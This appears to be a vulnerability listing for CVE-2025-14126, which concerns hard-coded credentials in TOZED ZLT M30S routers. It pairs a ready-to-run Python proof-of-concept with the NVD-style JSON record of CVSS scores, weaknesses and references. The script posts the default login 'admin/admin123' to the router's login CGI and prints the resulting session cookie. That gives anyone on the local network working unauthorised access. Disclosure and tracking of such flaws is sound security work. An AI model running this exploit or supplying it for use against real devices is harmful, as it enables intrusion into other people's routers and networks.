CVE-2025-14126

import requests import sys # CVE-2025-14126 PoC - TOZED ZLT M30S Hard-coded Credentials # Target: TOZED ZLT M30S / M30S PRO Router Web Interface def exploit(target_ip, username='admin', password='admin123'): """ Exploit hard-coded credentials on TOZED ZLT M30S router Args: target_ip: Target router IP address username: Hard-coded username (default: admin) password: Hard-coded password (default: admin123) Returns: bool: True if login successful, False otherwise """ login_url = f'http://{target_ip}/cgi-bin/login.cgi' payload = { 'username': username, 'password': password } try: response = requests.post(login_url, data=payload, timeout=10) if response.status_code == 200: # Check for successful login indicators if 'login' not in response.text.lower() or 'success' in response.text.lower(): print(f'[+] Login successful with {username}:{password}') print(f'[+] Session cookie: {response.cookies.get_dict()}') return True else: print('[-] Login failed - invalid credentials') return False else: print(f'[-] HTTP Error: {response.status_code}') return False except requests.exceptions.RequestException as e: print(f'[-] Connection error: {e}') return False if __name__ == '__main__': if len(sys.argv) < 2: print(f'Usage: python {sys.argv[0]} <target_ip>') sys.exit(1) target = sys.argv[1] exploit(target)

{"cve": {"id": "CVE-2025-14126", "sourceIdentifier": "[email protected]", "published": "2025-12-06T10:16:05.297", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in TOZED ZLT M30S and ZLT M30S PRO 1.47/3.09.06. Affected is an unknown function of the component Web Interface. Such manipulation leads to hard-coded credentials. The attack needs to be initiated within the local network. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C", "baseScore": 8.3, "accessVector": "ADJACENT_NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 6.5, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-259"}, {"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://vuldb.com/?ctiid.334521", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.334521", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.697498", "source": "[email protected]"}, {"url": "https://youtu.be/o8rfjSlpRxY", "source": "[email protected]"}]}}